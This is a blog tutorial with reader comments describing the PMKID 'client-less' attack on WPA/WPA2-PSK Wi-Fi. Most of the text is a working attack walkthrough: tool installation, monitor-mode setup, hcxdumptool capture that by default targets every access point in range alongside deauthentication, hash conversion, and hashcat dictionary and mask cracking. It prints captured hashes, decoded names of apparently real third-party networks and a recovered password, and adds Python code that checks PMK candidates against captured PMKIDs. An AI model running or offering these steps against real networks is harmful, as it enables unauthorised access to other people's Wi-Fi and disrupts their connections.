Hacking Wi-Fi without users

A new attack on Wi-Fi without Clients

There are many different attacks on Wi-Fi. The most universal one (working against almost all access points) is the attack on WPA/WPA2, because this technology is used in the vast majority of wireless access points. When a client connects to a WPA/WPA2-enabled access point, the EAPOL protocol is used, during which a step-by-step data exchange takes place between the access point and the client that wants to connect. The essence of the attack is that you need to capture the transmitted data completely (or at least part of it) and then find the password by brute force. Simply put, you first capture a handshake (in the EAPOL phase), and then run a brute-force attack to find the correct password.

Difficulties can arise at each of these two stages: problems with capturing a handshake can have a variety of causes, the most fatal of which is the absence of clients. That is, if no clients are connecting, the EAPOL protocol is never used, so there is nothing to intercept.

At the hashcat.net forum (topic https://hashcat.net/forum/thread-7717.html), a new method was found that allows you to get the data necessary for brute force without having to capture a handshake. This new technique allows you to attack Wi-Fi passwords - WPA/WPA2 PSK (Pre-Shared Key).

Wi-Fi has a variety of implementations and many related technologies and solutions. Therefore, the method described here does not work in all cases - it depends on the vendor and the details of its implementation. In addition, success may depend on the chipset of your Wi-Fi adapter.

Below is a little theory from the forum post, followed by an example of a real successful attack using this technique.

This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. WPA3 will be much harder to attack because of its modern key establishment protocol called "Simultaneous Authentication of Equals" (SAE).

It is not reported whether a new way of attacking WPA3 was found, but for WPA/WPA2 PSK a new attack was invented, and the necessary tools were also prepared. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single (the first) EAPOL frame.

At this time, we do not know for which vendors or for how many routers this technique will work, but the authors think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).

In this list:

  • IEEE 802.11i: Enhanced security (2004)
  • IEEE 802.11p: WAVE—Wireless Access for the Vehicular Environment (such as ambulances and passenger cars) (July 2010)
  • IEEE 802.11r: Fast BSS transition (FT) (2008)

The list also contains 802.11q, but this standard does not exist - the designation is merely reserved. The authors added it to the list as a joke, to spot those who copy and paste texts without any verification.

The main advantages of this attack are as follows:

  • No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string

Attack details

The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.

The original post gives three screenshots of an RSN PMKID in the first message of a handshake.

The PMKID is computed using HMAC-SHA1, where the key is the PMK and the data part is the concatenation of the fixed string label "PMK Name", the access point's MAC address and the station's MAC address; only the first 128 bits (16 bytes) of the HMAC output are used.

The calculation formula is as follows:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Since the PMK is the same as in a regular EAPOL 4-way handshake, this is an ideal attack vector.

We receive all the data we need in the first EAPOL frame from the AP.

Programs for attacking Wi-Fi without clients in Kali Linux

For this attack, you need three programs:

  • hcxdumptool v4.2.0 or higher - for capturing wireless frames
  • hcxtools v4.2.0 or higher - to extract the data required for brute force
  • hashcat v4.2.0 or higher - for password brute force

It is quite simple to install hcxdumptool and hcxtools in Kali Linux:

# install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool/
make
sudo make install
cd .. # up

# install hcxtools
sudo apt install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev
git clone https://github.com/ZerBea/hcxtools
cd hcxtools/
make
sudo make install
cd .. # up

rm -rf hcxdumptool hcxtools # cleaning

hashcat is installed in Kali Linux by default, but for GPU cracking it also requires the proprietary graphics drivers. Installing the nVidia proprietary drivers:

apt update && apt dist-upgrade -y
echo -e "blacklist nouveau\noptions nouveau modeset=0\nalias nouveau off" > /etc/modprobe.d/blacklist-nouveau.conf
update-initramfs -u && reboot
apt install -y ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit

Programs for attacking Wi-Fi without clients in BlackArch

hcxdumptool and hcxtools in this distribution are present in the repository, so they are installed with one command:

sudo pacman -S hcxdumptool hcxtools

How to install Hashcat in Arch Linux/BlackArch is explained here.

An example of a “client-less” attack on Wi-Fi

Let's start with the following command:

sudo hcxdumptool -I

With this command, we get a list of wlan interfaces:

  • c0b6f9daaf3e wlo1 (iwlwifi)
  • 00c0ca900d9f wlp0s20f0u1 (rt2800usb)

And also two warnings:

  • warning: NetworkManager is running with pid 578
  • warning: wpa_supplicant is running with pid 1190

They mean that the programs NetworkManager and wpa_supplicant, with process IDs 578 and 1190, are currently running. It is highly recommended to stop these programs. This can be done with the kill command followed by the PIDs of the processes (replace the numbers with your values):

sudo kill 578 1190

In theory, you do not need to put the Wi-Fi adapter into monitor mode yourself - hcxdumptool should do it for you - but if the next command produces the messages:

interface is not up
failed to init socket

then set the wireless interface into monitor mode manually with commands of the form:

sudo ip link set <interface> down
sudo iw dev <interface> set monitor control
sudo ip link set <interface> up

For example, if I want to use the interface wlp0s20f0u1, my commands look like this:

sudo ip link set wlp0s20f0u1 down
sudo iw dev wlp0s20f0u1 set monitor control
sudo ip link set wlp0s20f0u1 up

Run hcxdumptool to request the PMKID from the AP and to dump the received frames to a file (in pcapng format):

sudo hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15

In the previous command:

  • -o test.pcapng means to save the captured frames to the file test.pcapng in pcapng format
  • -i wlp0s20f0u1 means to use the Wi-Fi interface wlp0s20f0u1
  • --enable_status 15 means to enable real-time display of EAPOL, PROBEREQUEST/PROBERESPONSE, AUTHENTICATION and ASSOCIATION frames - you can reduce the verbosity, see the help: https://en.kali.tools/?p=841

The above command attempts to collect data from all access points within reach, and both the “client-less” attack and a classic deauthentication attack are used. If you want to collect PMKIDs without the parallel deauthentication attack, add the --disable_deauthentications option.

As already mentioned, by default all APs are attacked. If you want to attack only some of them, or only one, use the --filterlist=<file> option, where <file> contains the list of MAC addresses (one per line). Note that by default the targets in this list are NOT attacked (the list acts as an exclusion list); if you want to attack ONLY the targets from the list, add the --filtermode=2 option.

If you want to attack a specific access point and you know the channel it works on, you can also add the -c option followed by the channel number of the AP, in addition to the --filterlist option (with a file containing that one address) and the --filtermode=2 option.

If the AP receives our association request and supports sending the PMKID, we will see the message [FOUND PMKID]. That is, if [FOUND PMKID] appears, we have successfully received the PMKID of that access point.

In addition, from time to time summary data appears, including a powned counter, for example powned=6.

This means that data has been captured for six (in my case) access points. This is not necessarily a PMKID in every case - the counter also includes ordinary handshakes (if the deauthentication attack was not disabled).

Depending on the noise level of the Wi-Fi channel, it may take some time to receive the PMKID. The authors recommend running hcxdumptool for up to 10 minutes. Data collection can run for any length of time, but usually 10 minutes is more than enough. To stop the capture, just press Ctrl+c.

Now run hcxpcaptool to convert the captured data from the pcapng format to a hash format that hashcat accepts:

hcxpcaptool -z test.16800 test.pcapng

Here:

  • test.pcapng is the name of the file from which the data is extracted
  • the -z option means to save the PMKIDs, and is followed by the name of the output file

Detailed output:

start reading from test.pcapng

summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.10-arch1-1-ARCH
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 2974
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 51
probe requests...............: 18
probe responses..............: 24
association requests.........: 74
association responses........: 161
reassociation requests.......: 3
reassociation responses......: 43
authentications (OPEN SYSTEM): 2262
authentications (BROADCOM)...: 2244
authentications (APPLE)......: 17
EAPOL packets................: 336
EAPOL PMKIDs.................: 9

9 PMKID(s) written to test.16800

A total of 9 PMKIDs were saved to the test.16800 file.

A hash file is just a text file; you can open it with any text editor and examine it:

gedit test.16800

The contents of my file:

f2d89d22949759168edf5fd0324764a7*cc4eece1ad58*008092b75244*4e50414145
b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245
a695c4e6a51c1590ea06a458a1860a24*403dec1a88a8*a8880854af50*52756e6763686169
8a8e906b2fb33e0c66833e5efeb4dc8e*403dec187630*7429afe41473*747275655f686f6d6532475f343432
bba899c7bd8719487377dd38a83a2648*403decc272b8*bc926b7c4e2c*5061616e676f6f6e5f3247
5a2da74a1dbe085331dcd9af61a87f50*c88d833bea34*18e29fec7be3*57494e5645524e
e33c525441bf7588c53966addb685a4c*98ded0be2346*fcc2333f478f*546f6e323534386661323535306b616932353133
67661236088d31c937a4646ede4aa7bb*403decbeb114*fcc2333f478f*747275655f686f6d6532475f313036
1bdb53c369ca8c470d9cc990440f056f*2c088c5a4862*60a4d0044de7*426f6f63687532

Does it look cryptic? In fact, everything is quite simple. The most interesting part of each hash for us is the one after the last asterisk: it contains the name of the access point (ESSID) in hexadecimal form. To decode this name into readable form, use the following command:

echo HEX_string | xxd -r -p

For example, to find out the name encoded as 50555245204655524e4954555245:

echo 50555245204655524e4954555245 | xxd -r -p

Result:

PURE FURNITURE

To show the names of all access points for which data is captured, use the command:

awk -F "*" '{ system("echo " $4 " | xxd -r -p; echo" ) }' test.16800

If necessary, replace the test.16800 file name with another one.

The columns are the following (all hex encoded):

  • PMKID
  • MAC AP
  • MAC Station
  • ESSID

While not required, it is recommended to also use the -E, -I and -U options of hcxpcaptool. The files they produce can be fed to hashcat as wordlists and typically give good results.

  • -E retrieve possible passwords from Wi-Fi traffic (in addition, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic

The command along with these options:

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

New files essidlist (mostly consisting of access point names, but possibly containing other very interesting strings), identitylist and usernamelist may appear. A file is not created if nothing is found for it.

Now we can launch the brute-force attack.

You can run a dictionary attack or a mask attack, and you can attack all hashes in the file at once or individual ones.

For example, if I want to attack all hashes with a dictionary attack, my command is as follows:

hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" test.16800 bin/WiFi-autopwner/dict/rockyou_cleaned.txt

Where:

  • -m 16800 is a hash type to attack (no need to change)
  • -a 0 means dictionary attack
  • -w 3 means the use of an intensive load profile
  • -o "temp_cracked.txt" means to save the hacked passwords in the temp_cracked.txt file
  • test.16800 is a hash file
  • bin/WiFi-autopwner/dict/rockyou_cleaned.txt is the path to the dictionary used for cracking

If you want to crack only a single hash, then in the previous command specify the hash itself, in quotation marks, instead of the path to the hash file. For example, to crack the hash b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245, my command is:

hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" 'b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245' bin/WiFi-autopwner/dict/rockyou_cleaned.txt

For a mask attack, use the following command:

hashcat -m 16800 -a 3 -w 3 -o "temp2_cracked.txt" test.16800 ?d?d?d?d?d?d?d?d

Where:

  • -m 16800 is a hash type to attack (no need to change)
  • -a 3 means a mask attack
  • -w 3 means the use of an intensive load profile
  • -o "temp2_cracked.txt" means to save the hacked passwords in the temp2_cracked.txt file
  • test.16800 is a hash file
  • ?d?d?d?d?d?d?d?d is the mask for attack, it means a password of eight characters in length, consisting entirely of digits

Again, if you want to crack only a single hash, specify the hash itself, in quotation marks, instead of the path to the hash file. For example, to crack the hash b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245 with a mask, my command is:

hashcat -m 16800 -a 3 -w 3 -o "temp2_cracked.txt" 'b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245' ?d?d?d?d?d?d?d?d

If the password is found, it will be displayed and also saved to the file temp_cracked.txt or temp2_cracked.txt.

In this case, the records will have approximately the following form:

fa9a5dd2fb9029bfc9f4d1bd4e384bfb*403decc272b8*7081eb739a56*5061616e676f6f6e5f3247:00001777

That is, this is the original hash, followed by a colon and the password in clear text; in this case the password is 00001777. To decode the name of the access point, the already familiar construction is used:

echo 5061616e676f6f6e5f3247 | xxd -r -p
Paangoon_2G
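As an added example (not code from this page, hcxtools or hashcat), the following Python parses hashcat 16800 records like those above, decodes the ESSID column the way the xxd one-liner does, recognises the ':password' suffix of a cracked record, and implements the PMKID formula from the Attack details section so that a known PMK can be checked against a captured record. The PMK is taken as a given byte string (its derivation from the passphrase is not covered here); the two sample records are the page's own, while the PMK and MAC addresses used in the round-trip check are constructed values.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class PmkidEntry:
    pmkid: bytes                     # 16 bytes
    mac_ap: bytes                    # 6 bytes
    mac_sta: bytes                   # 6 bytes
    essid: bytes                     # raw ESSID bytes, hex-decoded
    password: Optional[str] = None   # present only on a cracked record


def parse_16800_line(line: str) -> PmkidEntry:
    """Parse one hashcat -m 16800 record: PMKID*MAC_AP*MAC_STA*ESSID[:password].
    All four fields are hex; hashcat appends ':password' in clear once cracked."""
    hash_part, sep, tail = line.strip().partition(":")
    fields = hash_part.split("*")
    if len(fields) != 4:
        raise ValueError(f"expected 4 '*'-separated fields, got {len(fields)}")
    pmkid, mac_ap, mac_sta, essid = (bytes.fromhex(f) for f in fields)
    if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("PMKID must be 16 bytes and each MAC 6 bytes")
    return PmkidEntry(pmkid, mac_ap, mac_sta, essid, tail if sep else None)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def pmk_matches(entry: PmkidEntry, pmk: bytes) -> bool:
    """True when this PMK reproduces the captured PMKID for the record's AP/station pair."""
    return hmac.compare_digest(compute_pmkid(pmk, entry.mac_ap, entry.mac_sta), entry.pmkid)


def essid_names(lines: List[str]) -> List[str]:
    """Decode the ESSID column of each record (the job of the awk/xxd one-liner)."""
    return [parse_16800_line(l).essid.decode("utf-8", "replace") for l in lines]


# Two records taken from the page: one from test.16800 and one cracked record with its password.
SAMPLE_LINES = [
    "b3304420b5100873aa23ee3fc2ab3244*d8fb5e49f484*9c04ebaaa33d*50555245204655524e4954555245",
    "fa9a5dd2fb9029bfc9f4d1bd4e384bfb*403decc272b8*7081eb739a56*5061616e676f6f6e5f3247:00001777",
]

if __name__ == "__main__":
    print(essid_names(SAMPLE_LINES), "password:", parse_16800_line(SAMPLE_LINES[1]).password)
    # Constructed PMK (a real PMK is 32 bytes) and constructed MACs: the formula round-trips.
    pmk = hashlib.sha256(b"constructed example PMK").digest()
    ap, sta = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    demo = PmkidEntry(compute_pmkid(pmk, ap, sta), ap, sta, b"demo")
    print("formula matches:", pmk_matches(demo, pmk))
```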

The results of the attack:

The first, dictionary attack did not succeed, but the second, mask attack cracked 2 of the 9 passwords.

Conclusion

This attack is an excellent addition to the already existing ones. With its help there is a real chance of obtaining the password of completely “hopeless” access points (those without clients and with WPS disabled).

See also ‘Hacking Wi-Fi without users in Aircrack-ng’.


6 Comments to Hacking Wi-Fi without users

  1. 0xIslamTaha says:

    thanks for your great effort.

  2. soufiane says:


    a good article, well explained, clear.. a good job.. thank you very much

  3. nbctcp says:

    error when installing nvidia-cuda-toolkit

    since I don't have a CUDA chip, I can't test that

    which of these works in this link?

    https://forums.kali.org/showthread.php?41684-Kali-2018-2-Installing-Nvidia-Driver-and-Cuda

  4. ahmad says:

    this whole website is so great. Thank You

  5. Mike says:

    But the real amazing part of hcxdumptool / hcxtools is the ability to "hack" a client, without an access point (AP-LESS attack vector).
